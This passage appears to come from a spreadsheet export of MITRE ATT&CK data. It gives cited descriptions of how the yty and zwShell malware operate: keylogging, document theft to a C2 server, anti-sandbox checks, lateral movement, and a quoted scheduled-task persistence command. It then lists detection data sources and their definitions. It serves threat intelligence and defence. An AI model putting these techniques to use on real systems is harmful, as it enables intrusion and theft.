    <t>[yty](https://attack.mitre.org/software/S0248) communicates to the C2 server by retrieving a Google Doc.(Citation: ASERT Donot March 2018)</t>
  </si>
  <si>
    <t>[yty](https://attack.mitre.org/software/S0248) contains junk code in its binary, likely to confuse malware analysts.(Citation: ASERT Donot March 2018)</t>
  </si>
  <si>
    <t>[yty](https://attack.mitre.org/software/S0248) collects files with the following extensions: .ppt, .pptx, .pdf, .doc, .docx, .xls, .xlsx, .docm, .rtf, .inp, .xlsm, .csv, .odt, .pps, .vcf and sends them back to the C2 server.(Citation: ASERT Donot March 2018)</t>
  </si>
  <si>
    <t>[yty](https://attack.mitre.org/software/S0248) gathers information on victim’s drives and has a plugin for document listing.(Citation: ASERT Donot March 2018)</t>
  </si>
  <si>
    <t>[yty](https://attack.mitre.org/software/S0248) uses a keylogger plugin to gather keystrokes.(Citation: ASERT Donot March 2018)</t>
  </si>
  <si>
    <t>[yty](https://attack.mitre.org/software/S0248) gets an output of running processes using the &lt;code&gt;tasklist&lt;/code&gt; command.(Citation: ASERT Donot March 2018)</t>
  </si>
  <si>
    <t>[yty](https://attack.mitre.org/software/S0248) uses the &lt;code&gt;net view&lt;/code&gt; command for discovery.(Citation: ASERT Donot March 2018)</t>
  </si>
  <si>
    <t>[yty](https://attack.mitre.org/software/S0248) establishes persistence by creating a scheduled task with the command &lt;code&gt;SchTasks /Create /SC DAILY /TN BigData /TR “ + path_file + “/ST 09:30“&lt;/code&gt;.(Citation: ASERT Donot March 2018)</t>
  </si>
  <si>
    <t>[yty](https://attack.mitre.org/software/S0248) collects screenshots of the victim machine.(Citation: ASERT Donot March 2018)</t>
  </si>
  <si>
    <t>[yty](https://attack.mitre.org/software/S0248) packs a plugin with UPX.(Citation: ASERT Donot March 2018)</t>
  </si>
  <si>
    <t>[yty](https://attack.mitre.org/software/S0248) has some basic anti-sandbox detection that tries to detect Virtual PC, Sandboxie, and VMware. (Citation: ASERT Donot March 2018)</t>
  </si>
  <si>
    <t>[yty](https://attack.mitre.org/software/S0248) gathers the computer name, the serial number of the main disk volume, CPU information, Microsoft Windows version, and runs the command &lt;code&gt;systeminfo&lt;/code&gt;.(Citation: ASERT Donot March 2018)</t>
  </si>
  <si>
    <t>[yty](https://attack.mitre.org/software/S0248) runs &lt;code&gt;ipconfig /all&lt;/code&gt; and collects the domain name.(Citation: ASERT Donot March 2018)</t>
  </si>
  <si>
    <t>[yty](https://attack.mitre.org/software/S0248) collects the victim’s username.(Citation: ASERT Donot March 2018)</t>
  </si>
  <si>
    <t>[zwShell](https://attack.mitre.org/software/S0350) has deleted itself after creating a service as well as deleted a temporary file when the system reboots.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>[zwShell](https://attack.mitre.org/software/S0350) can browse the file system.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>[zwShell](https://attack.mitre.org/software/S0350) can modify the Registry.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>[zwShell](https://attack.mitre.org/software/S0350) has used RDP for lateral movement.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>[zwShell](https://attack.mitre.org/software/S0350) has been copied over network shares to move laterally.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>[zwShell](https://attack.mitre.org/software/S0350) has used SchTasks for execution.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>[zwShell](https://attack.mitre.org/software/S0350) can obtain the victim PC name and OS version.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>[zwShell](https://attack.mitre.org/software/S0350) can obtain the victim IP address.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>[zwShell](https://attack.mitre.org/software/S0350) can obtain the name of the logged-in user on the victim.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>[zwShell](https://attack.mitre.org/software/S0350) can launch command-line shells.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>[zwShell](https://attack.mitre.org/software/S0350) has established persistence by adding itself as a new service.(Citation: McAfee Night Dragon)</t>
  </si>
  <si>
    <t>collection layers</t>
  </si>
  <si>
    <t>modified</t>
  </si>
  <si>
    <t>Active Directory</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Object Access</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Object Creation</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Object Deletion</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Object Modification</t>
  </si>
  <si>
    <t>Application Log</t>
  </si>
  <si>
    <t>Certificate</t>
  </si>
  <si>
    <t>Certificate: Certificate Registration</t>
  </si>
  <si>
    <t>Cloud Service</t>
  </si>
  <si>
    <t>Cloud Service: Cloud Service Disable</t>
  </si>
  <si>
    <t>Cloud Service: Cloud Service Metadata</t>
  </si>
  <si>
    <t>Cloud Service: Cloud Service Modification</t>
  </si>
  <si>
    <t>Cloud Storage</t>
  </si>
  <si>
    <t>Cloud Storage: Cloud Storage Creation</t>
  </si>
  <si>
    <t>Cloud Storage: Cloud Storage Deletion</t>
  </si>
  <si>
    <t>Cloud Storage: Cloud Storage Enumeration</t>
  </si>
  <si>
    <t>Cloud Storage: Cloud Storage Metadata</t>
  </si>
  <si>
    <t>Cloud Storage: Cloud Storage Modification</t>
  </si>
  <si>
    <t>Command</t>
  </si>
  <si>
    <t>Container</t>
  </si>
  <si>
    <t>Container: Container Creation</t>
  </si>
  <si>
    <t>Container: Container Enumeration</t>
  </si>
  <si>
    <t>Container: Container Start</t>
  </si>
  <si>
    <t>Domain Name</t>
  </si>
  <si>
    <t>Domain Name: Active DNS</t>
  </si>
  <si>
    <t>Domain Name: Domain Registration</t>
  </si>
  <si>
    <t>Domain Name: Passive DNS</t>
  </si>
  <si>
    <t>Drive</t>
  </si>
  <si>
    <t>Drive: Drive Access</t>
  </si>
  <si>
    <t>Drive: Drive Creation</t>
  </si>
  <si>
    <t>Driver</t>
  </si>
  <si>
    <t>Driver: Driver Load</t>
  </si>
  <si>
    <t>Driver: Driver Metadata</t>
  </si>
  <si>
    <t>File</t>
  </si>
  <si>
    <t>File: File Access</t>
  </si>
  <si>
    <t>File: File Deletion</t>
  </si>
  <si>
    <t>Firewall: Firewall Disable</t>
  </si>
  <si>
    <t>Firewall: Firewall Enumeration</t>
  </si>
  <si>
    <t>Firewall: Firewall Metadata</t>
  </si>
  <si>
    <t>Firewall: Firewall Rule Modification</t>
  </si>
  <si>
    <t>Group</t>
  </si>
  <si>
    <t>Group: Group Enumeration</t>
  </si>
  <si>
    <t>Group: Group Metadata</t>
  </si>
  <si>
    <t>Group: Group Modification</t>
  </si>
  <si>
    <t>Image</t>
  </si>
  <si>
    <t>Image: Image Creation</t>
  </si>
  <si>
    <t>Image: Image Deletion</t>
  </si>
  <si>
    <t>Image: Image Metadata</t>
  </si>
  <si>
    <t>Image: Image Modification</t>
  </si>
  <si>
    <t>Instance</t>
  </si>
  <si>
    <t>Instance: Instance Creation</t>
  </si>
  <si>
    <t>Instance: Instance Deletion</t>
  </si>
  <si>
    <t>Instance: Instance Enumeration</t>
  </si>
  <si>
    <t>Instance: Instance Metadata</t>
  </si>
  <si>
    <t>Instance: Instance Modification</t>
  </si>
  <si>
    <t>Instance: Instance Start</t>
  </si>
  <si>
    <t>Instance: Instance Stop</t>
  </si>
  <si>
    <t>Internet Scan</t>
  </si>
  <si>
    <t>Internet Scan: Response Metadata</t>
  </si>
  <si>
    <t>Kernel</t>
  </si>
  <si>
    <t>Kernel: Kernel Module Load</t>
  </si>
  <si>
    <t>Logon Session</t>
  </si>
  <si>
    <t>Logon Session: Logon Session Creation</t>
  </si>
  <si>
    <t>Malware Repository</t>
  </si>
  <si>
    <t>Malware Repository: Malware Content</t>
  </si>
  <si>
    <t>Module</t>
  </si>
  <si>
    <t>Module: Module Load</t>
  </si>
  <si>
    <t>Named Pipe</t>
  </si>
  <si>
    <t>Named Pipe: Named Pipe Metadata</t>
  </si>
  <si>
    <t>Network Share</t>
  </si>
  <si>
    <t>Network Share: Network Share Access</t>
  </si>
  <si>
    <t>Network Traffic</t>
  </si>
  <si>
    <t>Network Traffic: Network Connection Creation</t>
  </si>
  <si>
    <t>Persona</t>
  </si>
  <si>
    <t>Persona: Social Media</t>
  </si>
  <si>
    <t>Pod</t>
  </si>
  <si>
    <t>Pod: Pod Creation</t>
  </si>
  <si>
    <t>Pod: Pod Enumeration</t>
  </si>
  <si>
    <t>Pod: Pod Modification</t>
  </si>
  <si>
    <t>Process</t>
  </si>
  <si>
    <t>Process: Process Metadata</t>
  </si>
  <si>
    <t>Process: Process Modification</t>
  </si>
  <si>
    <t>Process: Process Termination</t>
  </si>
  <si>
    <t>Scheduled Job</t>
  </si>
  <si>
    <t>Scheduled Job: Scheduled Job Creation</t>
  </si>
  <si>
    <t>Scheduled Job: Scheduled Job Metadata</t>
  </si>
  <si>
    <t>Scheduled Job: Scheduled Job Modification</t>
  </si>
  <si>
    <t>Script</t>
  </si>
  <si>
    <t>Script: Script Execution</t>
  </si>
  <si>
    <t>Sensor Health</t>
  </si>
  <si>
    <t>Service</t>
  </si>
  <si>
    <t>Service: Service Creation</t>
  </si>
  <si>
    <t>Service: Service Metadata</t>
  </si>
  <si>
    <t>Service: Service Modification</t>
  </si>
  <si>
    <t>Snapshot</t>
  </si>
  <si>
    <t>Snapshot: Snapshot Creation</t>
  </si>
  <si>
    <t>Snapshot: Snapshot Deletion</t>
  </si>
  <si>
    <t>Snapshot: Snapshot Enumeration</t>
  </si>
  <si>
    <t>Snapshot: Snapshot Metadata</t>
  </si>
  <si>
    <t>Snapshot: Snapshot Modification</t>
  </si>
  <si>
    <t>User Account</t>
  </si>
  <si>
    <t>User Account: User Account Deletion</t>
  </si>
  <si>
    <t>User Account: User Account Metadata</t>
  </si>
  <si>
    <t>Volume</t>
  </si>
  <si>
    <t>Volume: Volume Creation</t>
  </si>
  <si>
    <t>Volume: Volume Deletion</t>
  </si>
  <si>
    <t>Volume: Volume Enumeration</t>
  </si>
  <si>
    <t>Volume: Volume Metadata</t>
  </si>
  <si>
    <t>Volume: Volume Modification</t>
  </si>
  <si>
    <t>WMI</t>
  </si>
  <si>
    <t>WMI: WMI Creation</t>
  </si>
  <si>
    <t>Web Credential</t>
  </si>
  <si>
    <t>Web Credential: Web Credential Creation</t>
  </si>
  <si>
    <t>Windows Registry</t>
  </si>
  <si>
    <t>Windows Registry: Windows Registry Key Access</t>
  </si>
  <si>
    <t>Windows Registry: Windows Registry Key Creation</t>
  </si>
  <si>
    <t>Windows Registry: Windows Registry Key Deletion</t>
  </si>
  <si>
    <t>Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>DS0026</t>
  </si>
  <si>
    <t>DS0015</t>
  </si>
  <si>
    <t>DS0037</t>
  </si>
  <si>
    <t>DS0025</t>
  </si>
  <si>
    <t>DS0010</t>
  </si>
  <si>
    <t>DS0017</t>
  </si>
  <si>
    <t>DS0032</t>
  </si>
  <si>
    <t>DS0038</t>
  </si>
  <si>
    <t>DS0016</t>
  </si>
  <si>
    <t>DS0027</t>
  </si>
  <si>
    <t>DS0022</t>
  </si>
  <si>
    <t>DS0018</t>
  </si>
  <si>
    <t>DS0001</t>
  </si>
  <si>
    <t>DS0036</t>
  </si>
  <si>
    <t>DS0007</t>
  </si>
  <si>
    <t>DS0030</t>
  </si>
  <si>
    <t>DS0035</t>
  </si>
  <si>
    <t>DS0008</t>
  </si>
  <si>
    <t>DS0028</t>
  </si>
  <si>
    <t>DS0004</t>
  </si>
  <si>
    <t>DS0011</t>
  </si>
  <si>
    <t>DS0023</t>
  </si>
  <si>
    <t>DS0033</t>
  </si>
  <si>
    <t>DS0029</t>
  </si>
  <si>
    <t>DS0021</t>
  </si>
  <si>
    <t>DS0014</t>
  </si>
  <si>
    <t>DS0009</t>
  </si>
  <si>
    <t>DS0003</t>
  </si>
  <si>
    <t>DS0012</t>
  </si>
  <si>
    <t>DS0013</t>
  </si>
  <si>
    <t>DS0019</t>
  </si>
  <si>
    <t>DS0020</t>
  </si>
  <si>
    <t>DS0002</t>
  </si>
  <si>
    <t>DS0034</t>
  </si>
  <si>
    <t>DS0005</t>
  </si>
  <si>
    <t>DS0006</t>
  </si>
  <si>
    <t>DS0024</t>
  </si>
  <si>
    <t>A database and set of services that allows administrators to manage permissions, access to network resources, and stored data objects (user, group, application, or devices)(Citation: Microsoft AD DS Getting Started)</t>
  </si>
  <si>
    <t>A user requested active directory credentials, such as a ticket or token (ex: Windows EID 4769)</t>
  </si>
  <si>
    <t>Opening of an active directory object, typically to collect/read its value (ex: Windows EID 4661)</t>
  </si>
  <si>
    <t>Initial construction of a new active directory object (ex: Windows EID 5137)</t>
  </si>
  <si>
    <t>Removal of an active directory object (ex: Windows EID 5141)</t>
  </si>
  <si>
    <t>Changes made to an active directory object (ex: Windows EID 5163 or 5136)</t>
  </si>
  <si>
    <t>Events collected by third-party services such as mail servers, web applications, or other appliances (not by the native OS or platform)(Citation: Confluence Logs)</t>
  </si>
  <si>
    <t>Logging, messaging, and other artifacts provided by third-party services (ex: metrics, errors, and/or alerts from mail/web applications)</t>
  </si>
  <si>
    <t>A digital document, which highlights information such as the owner's identity, used to instill trust in public keys used while encrypting network communications</t>
  </si>
  <si>
    <t>Queried or logged information highlighting current and expired digital certificates (ex: Certificate transparency)</t>
  </si>
  <si>
    <t>Infrastructure, platforms, or software that are hosted on-premise or by third-party providers, made available to users through network connections and/or APIs(Citation: Amazon AWS)(Citation: Azure Products)</t>
  </si>
  <si>
    <t>Deactivation or stoppage of a cloud service (ex: AWS Cloudtrail StopLogging)</t>
  </si>
  <si>
    <t>An extracted list of cloud services (ex: AWS ECS ListServices)</t>
  </si>
  <si>
    <t>Contextual data about a cloud service and activity around it such as name, type, or purpose/function</t>
  </si>
  <si>
    <t>Changes made to a cloud service, including its settings and/or data (ex: AWS CloudTrail DeleteTrail or DeleteConfigRule)</t>
  </si>
  <si>
    <t>Data object storage infrastructure hosted on-premise or by third-party providers, made available to users through network connections and/or APIs(Citation: Amazon S3)(Citation: Azure Blob Storage)(Citation: Google Cloud Storage)</t>
  </si>
  <si>
    <t>Opening of a cloud storage infrastructure, typically to collect/read its value (ex: AWS S3 GetObject)</t>
  </si>
  <si>
    <t>Initial construction of new cloud storage infrastructure (ex: AWS S3 CreateBucket)</t>
  </si>
  <si>
    <t>Removal of cloud storage infrastructure (ex: AWS S3 DeleteBucket)</t>
  </si>
  <si>
    <t>An extracted list of cloud storage infrastructure (ex: AWS S3 ListBuckets or ListObjects)</t>
  </si>
  <si>
    <t>Contextual data about cloud storage infrastructure and activity around it such as name, size, or owner</t>
  </si>
  <si>
    <t>Changes made to cloud storage infrastructure, including its settings and/or data (ex: AWS S3 PutObject or PutObjectAcl)</t>
  </si>
  <si>
    <t>A directive given to a computer program, acting as an interpreter of some kind, in order to perform a specific task(Citation: Confluence Linux Command  Line)(Citation: Audit OSX)</t>
  </si>
  <si>
    <t>The execution of a line of text, potentially with arguments, created from program code (e.g. a cmdlet executed via powershell.exe, interactive commands like &gt;dir, shell executions, etc. )</t>
  </si>
  <si>
    <t>A standard unit of virtualized software that packages up code and all its dependencies so the application runs quickly and reliably from one computing environment to another(Citation: Docker Docs Container)</t>
  </si>
  <si>
    <t>Initial construction of a new container (ex: docker create &lt;container_name&gt;)</t>
  </si>
  <si>
    <t>An extracted list of containers (ex: docker ps)</t>
  </si>
  <si>
    <t>Activation or invocation of a container (ex: docker start or docker restart)</t>
  </si>
  <si>
    <t>Information obtained (commonly through registration or activity logs) regarding one or more IP addresses registered with human readable names (ex: mitre.org)</t>
  </si>
  <si>
    <t>Queried domain name system (DNS) registry data highlighting current domain to IP address resolutions (ex: dig/nslookup queries)</t>
  </si>
  <si>
    <t>Information about domain name assignments and other domain metadata (ex: WHOIS)</t>
  </si>
  <si>
    <t>Logged domain name system (DNS) data highlighting timelines of domain to IP address resolutions (ex: passive DNS)</t>
  </si>
  <si>
    <t>A non-volatile data storage device (hard drive, floppy disk, USB flash drive) with at least one formatted partition, typically mounted to the file system and/or assigned a drive letter(Citation: Sysmon EID 9)</t>
  </si>
  <si>
    <t>Opening of a data storage device with an assigned drive letter or mount point</t>
  </si>
  <si>
    <t>Initial construction of a drive letter or mount point to a data storage device</t>
  </si>
  <si>
    <t>Changes made to a drive letter or mount point of a data storage device</t>
  </si>
  <si>
    <t>A computer program that operates or controls a particular type of device that is attached to a computer. Provides a software interface to hardware devices, enabling operating systems and other computer programs to access hardware functions without needing to know precise details about the hardware being used(Citation: IOKit Fundamentals)(Citation: Windows Getting Started Drivers)</t>
  </si>
  <si>
    <t>Attaching a driver to either user or kernel-mode of a system (ex: Sysmon EID 6)</t>
  </si>
  <si>
    <t>Contextual data about a driver and activity around it such as driver issues reporting or integrity (page hash, code) checking</t>
  </si>
  <si>
    <t>A computer resource object, managed by the I/O system, for storing data (such as images, text, videos, computer programs, or any wide variety of other media).(Citation: Microsoft File Mgmt)</t>
  </si>
  <si>
    <t>Opening a file, which makes the file contents available to the requestor (ex: Windows EID 4663)</t>
  </si>
  <si>
    <t>Initial construction of a new file (ex: Sysmon EID 11)</t>
  </si>
  <si>
    <t>Removal of a file (ex: Sysmon EID 23, macOS ESF EID ES_EVENT_TYPE_AUTH_UNLINK, or Linux commands auditd unlink, rename, rmdir, unlinked, or renameat rules)</t>
  </si>
  <si>
    <t>Contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/ower, permissions, etc.</t>
  </si>
  <si>
    <t>Changes made to a file, or its access permissions and attributes, typically to alter the contents of the targeted file (ex: Windows EID 4670 or Sysmon EID 2)</t>
  </si>
  <si>
    <t>A network security system, running locally on an endpoint or remotely as a service (ex: cloud environment), that monitors and controls incoming/outgoing network traffic based on predefined rules(Citation: AWS Sec Groups VPC)</t>
  </si>
  <si>
    <t>Deactivation or stoppage of a cloud service (ex: Write/Delete entries within Azure Firewall Activity Logs)</t>
  </si>
  <si>
    <t>An extracted list of available firewalls and/or their associated settings/rules (ex: Azure Network Firewall CLI Show commands)</t>
  </si>
  <si>
    <t>Contextual data about a firewall and activity around it such as name, policy, or status</t>
  </si>
  <si>
    <t>Changes made to a firewall rule, typically to allow/block specific network traffic (ex: Windows EID 4950 or Write/Delete entries within Azure Firewall Rule Collection Activity Logs)</t>
  </si>
  <si>
    <t>Computer software that provides low-level control for the hardware and device(s) of a host, such as BIOS or UEFI/EFI</t>
  </si>
  <si>
    <t>Changes made to firmware, including its settings and/or data, such as MBR (Master Boot Record) and VBR (Volume Boot Record)</t>
  </si>
  <si>
    <t>A collection of multiple user accounts that share the same access rights to the computer and/or network resources and have common security rights(Citation: Amazon IAM Groups)</t>
  </si>
  <si>
    <t>An extracted list of available groups and/or their associated settings (ex: AWS list-groups)</t>
  </si>
  <si>
    <t>Contextual data about a group which describes group and activity around it, such as name, permissions, or user accounts within the group</t>
  </si>
  <si>
    <t>Changes made to a group, such as membership, name, or permissions (ex: Windows EID 4728 or 4732, AWS IAM UpdateGroup)</t>
  </si>
  <si>
    <t>A single file used to deploy a virtual machine/bootable disk into an on-premise or third-party cloud environment(Citation: Microsoft Image)(Citation: Amazon AMI)</t>
  </si>
  <si>
    <t>Initial construction of a virtual machine image (ex: Azure Compute Service Images PUT)</t>
  </si>
  <si>
    <t>Removal of a virtual machine image (ex: Azure Compute Service Images DELETE)</t>
  </si>
  <si>
    <t>Contextual data about a virtual machine image such as name, resource group, state, or type</t>
  </si>
  <si>
    <t>Changes made to a virtual machine image, including setting and/or control data (ex: Azure Compute Service Images PATCH)</t>
  </si>
  <si>
    <t>A virtual server environment which runs workloads, hosted on-premise or by third-party cloud providers(Citation: Amazon VM)(Citation: Google VM)</t>
  </si>
  <si>
    <t>Initial construction of a new instance (ex: instance.insert within GCP Audit Logs)</t>
  </si>
  <si>
    <t>Removal of an instance (ex: instance.delete within GCP Audit Logs)</t>
  </si>
  <si>
    <t>An extracted list of instances within a cloud environment (ex: instance.list within GCP Audit Logs)</t>
  </si>
  <si>
    <t>Contextual data about an instance and activity around it such as name, type, or status</t>
  </si>
  <si>
    <t>Changes made to an instance, including its settings and/or control data (ex: instance.addResourcePolicies or instances.setMetadata within GCP Audit Logs)</t>
  </si>
  <si>
    <t>Activation or invocation of an instance (ex: instance.start within GCP Audit Logs)</t>
  </si>
  <si>
    <t>Deactivation or stoppage of an instance (ex: instance.stop within GCP Audit Logs)</t>
  </si>
  <si>
    <t>Information obtained (commonly via active network traffic probes or web crawling) regarding various types of resources and servers connected to the public Internet</t>
  </si>
  <si>
    <t>Logged network traffic in response to a scan showing both protocol header and body values</t>
  </si>
  <si>
    <t>Contextual data about an Internet-facing resource gathered from a scan, such as running services or ports</t>
  </si>
  <si>
    <t>A computer program, at the core of a computer OS, that resides in memory and facilitates interactions between hardware and software components(Citation: STIG Audit Kernel Modules)(Citation: Init Man Page)</t>
  </si>
  <si>
    <t>An object file that contains code to extend the running kernel of an OS, typically used to add support for new hardware (as device drivers) and/or filesystems, or for adding system calls</t>
  </si>
  <si>
    <t>Logon occurring on a system or resource (local, domain, or cloud) to which a user/device is gaining access after successful authentication and authorization(Citation: Microsoft Audit Logon Events)</t>
  </si>
  <si>
    <t>Initial construction of a successful new user logon following an authentication attempt. (e.g. Windows EID 4624, /var/log/utmp, or /var/log/wmtp)</t>
  </si>
  <si>
    <t>Contextual data about a logon session, such as username, logon type, access tokens (security context, user SIDs, logon identifiers, and logon SID), and any activity associated within it</t>
  </si>
  <si>
    <t>Information obtained (via shared or submitted samples) regarding malicious software (droppers, backdoors, etc.) used by adversaries</t>
  </si>
  <si>
    <t>Code, strings, and other signatures that compromise a malicious payload</t>
  </si>
  <si>
    <t>Contextual data about a malicious payload, such as compilation times, file hashes, as well as watermarks or other identifiable configuration information</t>
  </si>
  <si>
    <t>Executable files consisting of one or more shared classes and interfaces, such as portable executable (PE) format binaries/dynamic link libraries (DLL), executable and linkable format (ELF) binaries/shared libraries, and Mach-O format binaries/shared libraries(Citation: Microsoft LoadLibrary)(Citation: Microsoft Module Class)</t>
  </si>
  <si>
    <t>Attaching a module into the memory of a process/program, typically to access shared resources/features provided by the module (ex: Sysmon EID 7)</t>
  </si>
  <si>
    <t>Mechanisms that allow inter-process communication locally or over the network. A named pipe is usually found as a file and processes attach to it(Citation: Microsoft Named Pipes)</t>
  </si>
  <si>
    <t>Contextual data about a named pipe on a system, including pipe name and creating process (ex: Sysmon EIDs 17-18)</t>
  </si>
  <si>
    <t>A storage resource (typically a folder or drive) made available from one host to others using network protocols, such as Server Message Block (SMB) or Network File System (NFS)(Citation: Microsoft NFS Overview)</t>
  </si>
  <si>
    <t>Opening a network share, which makes the contents available to the requestor (ex: Windows EID 5140 or 5145)</t>
  </si>
  <si>
    <t>Data transmitted across a network (ex: Web, DNS, Mail, File, etc.), that is either summarized (ex: Netflow) and/or captured as raw data in an analyzable format (ex: PCAP)</t>
  </si>
  <si>
    <t>Initial construction of a network connection, such as capturing socket information with a source/destination IP and port(s) (ex: Windows EID 5156, Sysmon EID 3, or Zeek conn.log)</t>
  </si>
  <si>
    <t>Logged network traffic data showing both protocol header and body values (ex: PCAP)</t>
  </si>
  <si>
    <t>Summarized network packet data, with metrics, such as protocol headers and volume (ex: Netflow or Zeek http.log)</t>
  </si>
  <si>
    <t>A malicious online profile representing a user commonly used by adversaries to social engineer or otherwise target victims</t>
  </si>
  <si>
    <t>Established, compromised, or otherwise acquired social media personas</t>
  </si>
  <si>
    <t>A single unit of shared resources within a cluster, comprised of one or more containers(Citation: Kube Kubectl)(Citation: Kube Pod)</t>
  </si>
  <si>
    <t>Initial construction of a new pod (ex: kubectl apply|run)</t>
  </si>
  <si>
    <t>An extracted list of pods within a cluster (ex: kubectl get pods)</t>
  </si>
  <si>
    <t>Changes made to a pod, including its settings and/or control data (ex: kubectl set|patch|edit)</t>
  </si>
  <si>
    <t>Instances of computer programs that are being executed by at least one thread. Processes have memory space for process executables, loaded modules (DLLs or shared libraries), and allocated memory regions containing everything from user input to application-specific data structures(Citation: Microsoft Processes and Threads)</t>
  </si>
  <si>
    <t>Initial construction of a WMI object, such as a filter, consumer, subscription, binding, or provider (ex: Sysmon EIDs 19-21)</t>
  </si>
  <si>
    <t>Opening of a process by another process, typically to read memory of the target process (ex: Sysmon EID 10)</t>
  </si>
  <si>
    <t>The initial construction of an executable managed by the OS, that may involve one or more tasks or threads. (e.g. Win EID 4688, Sysmon EID 1, cmd.exe &gt; net use, etc.)</t>
  </si>
  <si>
    <t>Contextual data about a running process, which may include information such as environment variables, image name, user/owner, etc.</t>
  </si>
  <si>
    <t>Changes made to a process, or its contents, typically to write and/or execute code in the memory of the target process (ex: Sysmon EID 8)</t>
  </si>
  <si>
    <t>Exit of a running process (ex: Sysmon EID 5 or Windows EID 4689)</t>
  </si>
  <si>
    <t>Automated tasks that can be executed at a specific time or on a recurring schedule running in the background (ex: Cron daemon, task scheduler, BITS)(Citation: Microsoft Tasks)</t>
  </si>
  <si>
    <t>Initial construction of a new scheduled job (ex: Windows EID 4698 or /var/log cron logs)</t>
  </si>
  <si>
    <t>Contextual data about a scheduled job, which may include information such as name, timing, command(s), etc.</t>
  </si>
  <si>
    <t>Changes made to a scheduled job, such as modifications to the execution launch (ex: Windows EID 4702 or /var/log cron logs)</t>
  </si>
  <si>
    <t>A file or stream containing a list of commands, allowing them to be launched in sequence(Citation: Microsoft PowerShell Logging)(Citation: FireEye PowerShell Logging)(Citation: Microsoft AMSI)</t>
  </si>
  <si>
    <t>The execution of a text file that contains code via the interpreter (e.g. Powershell, WMI, Windows EID 4104, etc.)</t>
  </si>
  <si>
    <t>Information from host telemetry providing insights about system status, errors, or other notable functional activity</t>
  </si>
  <si>
    <t>Logging, messaging, and other artifacts highlighting the health of host sensors (ex: metrics, errors, and/or exceptions from logging applications)</t>
  </si>
  <si>
    <t>A computer process that is configured to execute continuously in the background and perform system tasks, in some cases before any user has logged in(Citation: Microsoft Services)(Citation: Linux Services Run Levels)</t>
  </si>
  <si>
    <t>Initial construction of a new service/daemon (ex: Windows EID 4697 or /var/log daemon logs)</t>
  </si>
  <si>
    <t>Contextual data about a service/daemon, which may include information such as name, service executable, start type, etc.</t>
  </si>
  <si>
    <t>Changes made to a service/daemon, such as changes to name, description, and/or start type (ex: Windows EID 7040 or /var/log daemon logs)</t>
  </si>
  <si>
    <t>A point-in-time copy of cloud volumes (files, settings, etc.) that can be created and/or deployed in cloud environments(Citation: Microsoft Snapshot)(Citation: Amazon Snapshots)</t>
  </si>
  <si>
    <t>Initial construction of a new snapshot (ex: AWS create-snapshot)</t>
  </si>
  <si>
    <t>Removal of a snapshot (ex: AWS delete-snapshot)</t>
  </si>
  <si>
    <t>An extracted list of snapshops within a cloud environment (ex: AWS describe-snapshots)</t>
  </si>
  <si>
    <t>Contextual data about a snapshot, which may include information such as ID, type, and status</t>
  </si>
  <si>
    <t>Changes made to a snapshop, such as metadata and control data (ex: AWS modify-snapshot-attribute)</t>
  </si>
  <si>
    <t>A profile representing a user, device, service, or application used to authenticate and access resources</t>
  </si>
  <si>
    <t>An attempt by a user to gain access to a network or computing resource, often by providing credentials (ex: Windows EID 4776 or /var/log/auth.log)</t>
  </si>
  <si>
    <t>Initial construction of a new account (ex: Windows EID 4720 or /etc/passwd logs)</t>
  </si>
  <si>
    <t>Removal of an account (ex: Windows EID 4726 or /var/log access/authentication logs)</t>
  </si>
  <si>
    <t>Contextual data about an account, which may include a username, user ID, environmental data, etc.</t>
  </si>
  <si>
    <t>Changes made to an account, such as permissions and/or membership in specific groups (ex: Windows EID 4738 or /var/log access/authentication logs)</t>
  </si>
  <si>
    <t>Block object storage hosted on-premise or by third-party providers, typically made available to resources as virtualized hard drives(Citation: Amazon S3)(Citation: Azure Blob Storage)(Citation: Google Cloud Storage)</t>
  </si>
  <si>
    <t>Initial construction of a cloud volume (ex: AWS create-volume)</t>
  </si>
  <si>
    <t>Removal of a a cloud volume (ex: AWS delete-volume)</t>
  </si>
  <si>
    <t>An extracted list of available volumes within a cloud environment (ex: AWS describe-volumes)</t>
  </si>
  <si>
    <t>Contextual data about a cloud volume and activity around it, such as id, type, state, and size</t>
  </si>
  <si>
    <t>Changes made to a cloud volume, including its settings and control data (ex: AWS modify-volume)</t>
  </si>
  <si>
    <t>The infrastructure for management data and operations that enables local and remote management of Windows personal computers and servers(Citation: Microsoft WMI System Classes)(Citation: Microsoft WMI Architecture)</t>
  </si>
  <si>
    <t>Credential material, such as session cookies or tokens, used to authenticate to web applications and services(Citation: Medium Authentication Tokens)(Citation: Auth0 Access Tokens)</t>
  </si>
  <si>
    <t>Initial construction of new web credential material (ex: Windows EID 1200 or 4769)</t>
  </si>
  <si>
    <t>An attempt by a user to gain access to a network or computing resource by providing web credentials (ex: Windows EID 1202)</t>
  </si>
  <si>
    <t>A Windows OS hierarchical database that stores much of the information and settings for software programs, hardware devices, user preferences, and operating-system configurations(Citation: Microsoft Registry)</t>
  </si>
  <si>
    <t>Opening a Registry Key, typically to read the associated value (ex: Windows EID 4656)</t>
  </si>
  <si>
    <t>Initial construction of a new Registry Key (ex: Windows EID 4656 or Sysmon EID 12)</t>
  </si>
  <si>
    <t>Removal of a Registry Key (ex: Windows EID 4658 or Sysmon EID 12)</t>
  </si>
  <si>
    <t>Changes made to a Registry Key and/or Key value (ex: Windows EID 4657 or Sysmon EID 13|14)</t>
  </si>
  <si>
    <t>Cloud Control Plane, Host</t>
  </si>
  <si>
    <t>OSINT</t>
  </si>
  <si>
    <t>Cloud Control Plane</t>
  </si>
  <si>
    <t>Container, Host</t>
  </si>
  <si>
    <t>Host</t>
  </si>
  <si>
    <t>Cloud Control Plane, Host, Network</t>
  </si>
  <si>
